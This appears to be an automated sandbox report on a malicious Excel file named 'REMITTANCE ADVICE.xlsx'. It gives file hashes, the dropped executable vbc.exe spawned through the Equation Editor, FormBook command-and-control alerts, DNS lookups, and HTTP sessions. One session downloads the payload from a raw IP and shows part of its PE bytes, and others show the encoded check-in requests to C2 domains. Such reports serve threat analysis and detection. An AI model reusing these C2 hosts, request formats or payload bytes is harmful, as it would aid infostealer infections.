                                                  Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  C:\Users\user\AppData\Local\Temp\~DFFCF9EB155A244E75.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\Desktop\~$REMITTANCE ADVICE.xlsx
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):165
                                                  Entropy (8bit):1.4377382811115937
                                                  Encrypted:false
                                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                  Malicious:true
                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  C:\Users\Public\vbc.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Category:dropped
                                                  Size (bytes):305085
                                                  Entropy (8bit):7.93321683103638
                                                  Encrypted:false
                                                  SSDEEP:6144:rGiIouWvjqebPleWFVGwN5QwB0ZmAFd+DnMAlym7a:fzuebPlDVGwNh3AFPb
                                                  MD5:1624595E2354FF7BE9E7DC6DEF2ED69E
                                                  SHA1:1DCFAAE594E3690D3FEF5FD4DE855D02E9CBB2A5
                                                  SHA-256:4B50745E74FEA6FAA516B4D46B7C9FBE36FDAE2301B76EC940635D033707A2C8
                                                  SHA-512:AEBD6E6D28ECAB56E48B037836C2FFC573A8493B576EA3B59AC6932C6E782FC99AD1DA7A67A231830A2C4612C89E24F0E7F483D24080F29D6133D81C7207971E
                                                  Malicious:true
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................................................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:CDFV2 Encrypted
                                                  Entropy (8bit):7.970312526321275
                                                  TrID:
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                  File name:REMITTANCE ADVICE.xlsx
                                                  File size:234184
                                                  MD5:2caab2292b282e6a5dea1cf78f84924a
                                                  SHA1:86f37c31091b15cca135490a84eb52027bb1a4df
                                                  SHA256:4c84124c87cd46ce58a7a8208ad1674c4a270793f9a6158e80fd28f96b3cc844
                                                  SHA512:70590f55c98c31fb7b2a95cb6d6b63917e1fa0f868c3af852a805d45cbb176356a4b1dc1431ef908c680821730d0d02948956c03388fcee6fcf6bbd661d55733
                                                  SSDEEP:6144:yxNNFbveUPpgiOrpvu5LaIXWjBUnsP9UYTO17ENuja:aNrbveei5uJWjTFFUQNv
                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  11/25/21-18:13:29.812628TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                  11/25/21-18:13:29.812628TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                  11/25/21-18:13:29.812628TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                  11/25/21-18:13:29.930166TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22
                                                  11/25/21-18:13:40.957479TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.22156.234.44.48
                                                  11/25/21-18:13:40.957479TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.22156.234.44.48
                                                  11/25/21-18:13:40.957479TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.22156.234.44.48

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 25, 2021 18:12:12.796477079 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:12.973809004 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:12.973917961 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:12.974230051 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.155354977 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.155431986 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.155488968 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.155539989 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.155603886 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.155635118 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.155755997 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.332767010 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.332989931 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.333447933 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.333520889 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.333550930 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.333568096 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.333571911 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.333620071 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.333641052 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.333655119 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.333659887 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.333698034 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.333719969 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.333738089 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.333740950 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.333770037 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511115074 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511159897 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511185884 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511209011 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511208057 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511234999 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511245012 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511261940 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511270046 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511286020 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511290073 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511312008 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511315107 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511333942 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511338949 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511351109 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511365891 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511378050 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511393070 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511405945 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511419058 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511442900 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511445045 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511456966 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511471033 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511480093 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511497021 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511507988 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511523008 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.511534929 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.511558056 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.513379097 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.688592911 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.688673973 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.688731909 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.688788891 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.688808918 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.688841105 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.688869953 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.688874006 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.688914061 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.688932896 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689018011 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689054966 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689057112 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689097881 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689111948 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689129114 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689146042 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689169884 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689176083 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689209938 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689229012 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689249039 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689260960 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689291000 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689304113 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689331055 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689333916 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689369917 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689385891 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689409971 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689420938 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689449072 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689461946 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689490080 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689507961 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689532995 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689553976 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689570904 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689580917 CET4916780192.168.2.22192.210.173.90
                                                  Nov 25, 2021 18:12:13.689610004 CET8049167192.210.173.90192.168.2.22
                                                  Nov 25, 2021 18:12:13.689610958 CET4916780192.168.2.22192.210.173.90

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 25, 2021 18:13:29.634049892 CET5216753192.168.2.228.8.8.8
                                                  Nov 25, 2021 18:13:29.655356884 CET53521678.8.8.8192.168.2.22
                                                  Nov 25, 2021 18:13:34.947618008 CET5059153192.168.2.228.8.8.8
                                                  Nov 25, 2021 18:13:35.128479004 CET53505918.8.8.8192.168.2.22
                                                  Nov 25, 2021 18:13:40.503207922 CET5780553192.168.2.228.8.8.8
                                                  Nov 25, 2021 18:13:40.709136963 CET53578058.8.8.8192.168.2.22
                                                  Nov 25, 2021 18:13:46.443938971 CET5903053192.168.2.228.8.8.8
                                                  Nov 25, 2021 18:13:46.498696089 CET53590308.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Nov 25, 2021 18:13:29.634049892 CET192.168.2.228.8.8.80x439cStandard query (0)www.promtgloan.comA (IP address)IN (0x0001)
                                                  Nov 25, 2021 18:13:34.947618008 CET192.168.2.228.8.8.80x8eb8Standard query (0)www.yhxt13800.comA (IP address)IN (0x0001)
                                                  Nov 25, 2021 18:13:40.503207922 CET192.168.2.228.8.8.80xc18cStandard query (0)www.clicktoreach.comA (IP address)IN (0x0001)
                                                  Nov 25, 2021 18:13:46.443938971 CET192.168.2.228.8.8.80xfc43Standard query (0)www.ff4cu6twc.xyzA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Nov 25, 2021 18:13:29.655356884 CET8.8.8.8192.168.2.220x439cNo error (0)www.promtgloan.compromtgloan.comCNAME (Canonical name)IN (0x0001)
                                                  Nov 25, 2021 18:13:29.655356884 CET8.8.8.8192.168.2.220x439cNo error (0)promtgloan.com34.102.136.180A (IP address)IN (0x0001)
                                                  Nov 25, 2021 18:13:35.128479004 CET8.8.8.8192.168.2.220x8eb8No error (0)www.yhxt13800.com154.205.233.189A (IP address)IN (0x0001)
                                                  Nov 25, 2021 18:13:40.709136963 CET8.8.8.8192.168.2.220xc18cNo error (0)www.clicktoreach.com156.234.44.48A (IP address)IN (0x0001)
                                                  Nov 25, 2021 18:13:46.498696089 CET8.8.8.8192.168.2.220xfc43No error (0)www.ff4cu6twc.xyzff4cu6twc.xyzCNAME (Canonical name)IN (0x0001)
                                                  Nov 25, 2021 18:13:46.498696089 CET8.8.8.8192.168.2.220xfc43No error (0)ff4cu6twc.xyz23.225.139.107A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • 192.210.173.90
                                                  • www.promtgloan.com
                                                  • www.yhxt13800.com
                                                  • www.clicktoreach.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.2249167192.210.173.9080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  Nov 25, 2021 18:12:12.974230051 CET0OUTGET /70007/vbc.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 192.210.173.90
                                                  Connection: Keep-Alive
                                                  Nov 25, 2021 18:12:13.155354977 CET1INHTTP/1.1 200 OK
                                                  Date: Thu, 25 Nov 2021 17:12:13 GMT
                                                  Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
                                                  Last-Modified: Wed, 24 Nov 2021 09:28:50 GMT
                                                  ETag: "4a7bd-5d1857c59b117"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 305085
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 70 03 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELH\0p@tpp.texth[\ `.rdatap`@@.dataX\t@.ndata.rsrcpx@@


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Nov 25, 2021 18:13:29.812628031 CET323OUTGET /m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw== HTTP/1.1
                                                  Host: www.promtgloan.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 25, 2021 18:13:29.930166006 CET324INHTTP/1.1 403 Forbidden
                                                  Server: openresty
                                                  Date: Thu, 25 Nov 2021 17:13:29 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 275
                                                  ETag: "6192576c-113"
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.2249169154.205.233.18980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Nov 25, 2021 18:13:35.307363987 CET324OUTGET /m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA HTTP/1.1
                                                  Host: www.yhxt13800.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 25, 2021 18:13:35.485795021 CET326INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 25 Nov 2021 17:13:43 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 2025
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d0 c2 d3 e0 c7 bd c6 cc bb e1 d5 b9 b7 fe ce f1 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 36 38 3b 26 23 32 36 34 31 32 3b 26 23 32 30 32 33 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 36 33 36 38 3b 26 23 32 32 38 32 33 3b 26 23 33 30 33 34 30 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 36 38 3b 26 23 32 36 34 31 32 3b 26 23 32 30 32 33 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 36 33 36 38 3b 26 23 32 32 38 32 33 3b 26 23 33 30 33 34 30 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 31 39 39 36 38 3b 26 